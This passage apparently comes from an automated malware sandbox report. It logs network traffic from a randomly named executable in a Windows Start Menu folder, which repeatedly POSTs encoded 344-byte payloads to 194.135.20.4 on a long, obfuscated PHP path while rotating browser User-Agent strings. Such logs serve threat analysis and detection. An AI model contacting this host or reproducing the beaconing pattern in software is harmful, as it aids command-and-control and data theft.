                                                        Nov 2, 2024 17:48:24.709645033 CET8049998194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:48:24.709753036 CET4999880192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:24.710217953 CET4999880192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:24.715107918 CET8049998194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:48:25.060025930 CET4999880192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:25.064892054 CET8049998194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:48:25.536206007 CET8049998194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:48:25.612186909 CET4999880192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:25.869501114 CET4999880192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:34.402735949 CET5000080192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:34.407989979 CET8050000194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:48:34.408061028 CET5000080192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:34.408323050 CET5000080192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:34.413300037 CET8050000194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:48:34.762912989 CET5000080192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:34.767709970 CET8050000194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:48:35.251580000 CET8050000194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:48:35.409476995 CET5000080192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:35.546955109 CET5000080192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:47.869316101 CET5000280192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:47.874109983 CET8050002194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:48:47.875113964 CET5000280192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:47.882309914 CET5000280192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:47.887243032 CET8050002194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:48:48.231930017 CET5000280192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:48.236876965 CET8050002194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:48:48.706559896 CET8050002194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:48:48.746972084 CET5000280192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:49.007323027 CET5000280192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:57.782800913 CET5000480192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:57.787770987 CET8050004194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:48:57.787841082 CET5000480192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:57.788095951 CET5000480192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:57.793592930 CET8050004194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:48:58.138127089 CET5000480192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:58.143105030 CET8050004194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:48:58.612087011 CET8050004194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:48:58.684477091 CET5000480192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:59.058868885 CET5000480192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:09.511331081 CET5000580192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:09.516477108 CET8050005194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:49:09.516567945 CET5000580192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:09.516796112 CET5000580192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:09.521775961 CET8050005194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:49:09.874196053 CET5000580192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:09.879251957 CET8050005194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:49:10.363123894 CET8050005194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:49:10.569070101 CET5000580192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:10.759619951 CET5000580192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:23.019195080 CET5000880192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:23.024152040 CET8050008194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:49:23.024254084 CET5000880192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:23.024516106 CET5000880192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:23.029514074 CET8050008194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:49:23.372236967 CET5000880192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:23.377084970 CET8050008194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:49:23.885118961 CET8050008194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:49:23.997157097 CET5000880192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:24.305278063 CET5000880192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:31.852915049 CET5000980192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:31.857708931 CET8050009194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:49:31.857809067 CET5000980192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:31.858023882 CET5000980192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:31.862798929 CET8050009194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:49:32.216011047 CET5000980192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:32.220918894 CET8050009194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:49:32.698788881 CET8050009194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:49:32.751138926 CET5000980192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:32.796513081 CET5000980192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:44.770307064 CET5001180192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:44.775206089 CET8050011194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:49:44.775269032 CET5001180192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:44.775507927 CET5001180192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:44.780255079 CET8050011194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:49:45.122374058 CET5001180192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:49:45.127199888 CET8050011194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:49:45.629149914 CET8050011194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:49:45.710601091 CET5001180192.168.2.5194.135.20.4

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Nov 2, 2024 17:47:20.892128944 CET1.1.1.1192.168.2.50x616fNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                        Nov 2, 2024 17:47:20.892128944 CET1.1.1.1192.168.2.50x616fNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • 194.135.20.4

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.549829194.135.20.4804072C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 2, 2024 17:47:47.524085045 CET499OUTPOST /8/traffic/DumpprivateWp2/Bigload8/downloadsGame/TemporaryMulti6/WpLinux/line1/3PacketBase/DownloadsApiPublicTo/3TempcdnPublic/private8ToWp/58cpuasync/26Api/javascriptJs/javascript/default/eternalImageProvider/EternalTopollpacketlowapiprotectTrafficWordpress.php HTTP/1.1
                                                        Content-Type: application/octet-stream
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                        Host: 194.135.20.4
                                                        Content-Length: 344
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Nov 2, 2024 17:47:47.872826099 CET344OUTData Raw: 05 02 04 06 03 0b 01 0a 05 06 02 01 02 02 01 07 00 07 05 0d 02 06 03 09 03 07 0e 03 03 06 01 54 0d 51 06 5a 00 02 06 00 0e 51 06 06 05 04 04 04 03 0a 0c 5e 0e 04 05 0b 06 0e 04 57 05 04 00 0c 02 56 0f 0c 05 00 07 51 0d 02 0e 05 0c 54 0e 09 04 54
                                                        Data Ascii: TQZQ^WVQTTPWW\L~|^uZc[}uvsT|RyMwotLcRy|wxpW^mQUt^`L}e~V@{}f}\u
                                                        Nov 2, 2024 17:47:48.351445913 CET516INHTTP/1.1 100 Continue
                                                        Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 4e 6f 76 20 32 30 32 34 20 31 36 3a 34 37 3a 34 38 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 34 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c [TRUNCATED]
                                                        Data Ascii: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 16:47:48 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 274Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.135.20.4 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.549909194.135.20.4804616C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 2, 2024 17:48:02.920274973 CET534OUTPOST /8/traffic/DumpprivateWp2/Bigload8/downloadsGame/TemporaryMulti6/WpLinux/line1/3PacketBase/DownloadsApiPublicTo/3TempcdnPublic/private8ToWp/58cpuasync/26Api/javascriptJs/javascript/default/eternalImageProvider/EternalTopollpacketlowapiprotectTrafficWordpress.php HTTP/1.1
                                                        Content-Type: application/octet-stream
                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 194.135.20.4
                                                        Content-Length: 344
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Nov 2, 2024 17:48:03.278435946 CET344OUTData Raw: 00 05 01 07 06 0f 04 05 05 06 02 01 02 0c 01 03 00 0a 05 00 02 07 03 09 07 01 0e 03 06 07 06 00 0c 01 07 01 02 04 05 0a 0c 0a 05 57 04 0a 07 00 07 02 0d 59 0a 07 06 02 05 01 04 06 06 00 04 09 02 01 0d 0b 04 01 04 54 0b 04 0e 00 0f 06 0f 00 07 02
                                                        Data Ascii: WYTRVW\L}PhNXOc\aBbflA~lecl]Xk]{Zxll_{^aXkm]Qvw]Z~u~V@x}\}Lu
                                                        Nov 2, 2024 17:48:03.731477022 CET25INHTTP/1.1 100 Continue
                                                        Nov 2, 2024 17:48:03.731488943 CET491INHTTP/1.1 404 Not Found
                                                        Date: Sat, 02 Nov 2024 16:48:03 GMT
                                                        Server: Apache/2.4.41 (Ubuntu)
                                                        Content-Length: 274
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 34 2e 31 33 35 2e 32 30 2e 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.135.20.4 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.549968194.135.20.4804564C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 2, 2024 17:48:14.993206024 CET552OUTPOST /8/traffic/DumpprivateWp2/Bigload8/downloadsGame/TemporaryMulti6/WpLinux/line1/3PacketBase/DownloadsApiPublicTo/3TempcdnPublic/private8ToWp/58cpuasync/26Api/javascriptJs/javascript/default/eternalImageProvider/EternalTopollpacketlowapiprotectTrafficWordpress.php HTTP/1.1
                                                        Content-Type: application/octet-stream
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                        Host: 194.135.20.4
                                                        Content-Length: 344
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Nov 2, 2024 17:48:15.341116905 CET344OUTData Raw: 00 04 01 06 03 0a 04 06 05 06 02 01 02 00 01 01 00 07 05 0c 02 01 03 0c 01 06 0d 0c 03 00 02 06 0f 54 03 0e 01 03 03 05 0c 50 07 03 06 01 02 0f 04 07 0d 00 0d 0f 04 55 05 02 03 00 04 50 06 0c 02 57 0d 5c 04 0e 01 05 0f 01 0c 0e 0c 03 0e 56 05 02
                                                        Data Ascii: TPUPW\VWS\L~|NPwr[vlOz]tRR`ty|`ZxpPhnwQwwZO~e~V@xSf~ba
                                                        Nov 2, 2024 17:48:15.859442949 CET516INHTTP/1.1 100 Continue
                                                        Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 4e 6f 76 20 32 30 32 34 20 31 36 3a 34 38 3a 31 35 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 34 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c [TRUNCATED]
                                                        Data Ascii: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 16:48:15 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 274Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.135.20.4 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.549998194.135.20.4806500C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 2, 2024 17:48:24.710217953 CET487OUTPOST /8/traffic/DumpprivateWp2/Bigload8/downloadsGame/TemporaryMulti6/WpLinux/line1/3PacketBase/DownloadsApiPublicTo/3TempcdnPublic/private8ToWp/58cpuasync/26Api/javascriptJs/javascript/default/eternalImageProvider/EternalTopollpacketlowapiprotectTrafficWordpress.php HTTP/1.1
                                                        Content-Type: application/octet-stream
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: 194.135.20.4
                                                        Content-Length: 344
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Nov 2, 2024 17:48:25.060025930 CET344OUTData Raw: 05 00 01 01 06 0d 01 04 05 06 02 01 02 04 01 06 00 06 05 0e 02 02 03 0e 03 02 0f 03 07 05 03 53 0c 00 06 0b 00 51 04 56 0b 04 06 00 07 06 05 51 05 03 0c 09 0e 03 04 52 06 05 03 02 01 01 05 5f 02 57 0a 00 00 0f 07 01 0e 55 0c 57 0a 06 0b 06 04 04
                                                        Data Ascii: SQVQR_WUWRQ\L~A|czMtLiu\|Blb_tllO|ctoRpZ{paY|SRcwtLu~V@@{mb~\i
                                                        Nov 2, 2024 17:48:25.536206007 CET516INHTTP/1.1 100 Continue
                                                        Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 4e 6f 76 20 32 30 32 34 20 31 36 3a 34 38 3a 32 35 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 34 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c [TRUNCATED]
                                                        Data Ascii: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 16:48:25 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 274Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.135.20.4 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.550000194.135.20.4801672C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 2, 2024 17:48:34.408323050 CET499OUTPOST /8/traffic/DumpprivateWp2/Bigload8/downloadsGame/TemporaryMulti6/WpLinux/line1/3PacketBase/DownloadsApiPublicTo/3TempcdnPublic/private8ToWp/58cpuasync/26Api/javascriptJs/javascript/default/eternalImageProvider/EternalTopollpacketlowapiprotectTrafficWordpress.php HTTP/1.1
                                                        Content-Type: application/octet-stream
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: 194.135.20.4
                                                        Content-Length: 344
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Nov 2, 2024 17:48:34.762912989 CET344OUTData Raw: 05 06 04 04 03 0f 04 05 05 06 02 01 02 02 01 07 00 04 05 01 02 04 03 09 00 55 0d 54 06 57 02 05 0a 04 04 0e 02 06 05 0a 0f 04 05 0a 04 00 04 00 05 04 0d 0c 0f 50 05 52 07 07 06 0c 07 00 04 0f 05 05 0d 0e 00 01 06 09 0c 53 0c 0f 0e 02 0b 06 06 06
                                                        Data Ascii: UTWPRS[ZS\L~C|a^`[mLbuQThoeOclZ|`hDoo{YuX}}Rwdh~O~V@{}T}ru
                                                        Nov 2, 2024 17:48:35.251580000 CET516INHTTP/1.1 100 Continue
                                                        Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 4e 6f 76 20 32 30 32 34 20 31 36 3a 34 38 3a 33 35 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 34 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c [TRUNCATED]
                                                        Data Ascii: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 16:48:35 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 274Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.135.20.4 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.550002194.135.20.4807084C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 2, 2024 17:48:47.882309914 CET552OUTPOST /8/traffic/DumpprivateWp2/Bigload8/downloadsGame/TemporaryMulti6/WpLinux/line1/3PacketBase/DownloadsApiPublicTo/3TempcdnPublic/private8ToWp/58cpuasync/26Api/javascriptJs/javascript/default/eternalImageProvider/EternalTopollpacketlowapiprotectTrafficWordpress.php HTTP/1.1
                                                        Content-Type: application/octet-stream
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                        Host: 194.135.20.4
                                                        Content-Length: 344
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Nov 2, 2024 17:48:48.231930017 CET344OUTData Raw: 05 06 01 00 06 00 01 0b 05 06 02 01 02 04 01 04 00 05 05 0c 02 00 03 08 02 02 0d 07 06 55 02 09 0e 05 04 5e 02 50 04 04 0e 51 04 00 00 0b 02 03 04 50 0c 0c 0e 03 01 07 07 05 07 00 05 07 07 5b 01 07 0e 59 06 00 07 00 0e 54 0e 07 0c 04 0d 08 05 50
                                                        Data Ascii: U^PQP[YTPUWP\L}Q|^T@wqawu^Bk|rXc|]Y|]U[{Ux_xpv|Pw^t}_~V@@{Cn~rq
                                                        Nov 2, 2024 17:48:48.706559896 CET516INHTTP/1.1 100 Continue
                                                        Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 4e 6f 76 20 32 30 32 34 20 31 36 3a 34 38 3a 34 38 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 34 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c [TRUNCATED]
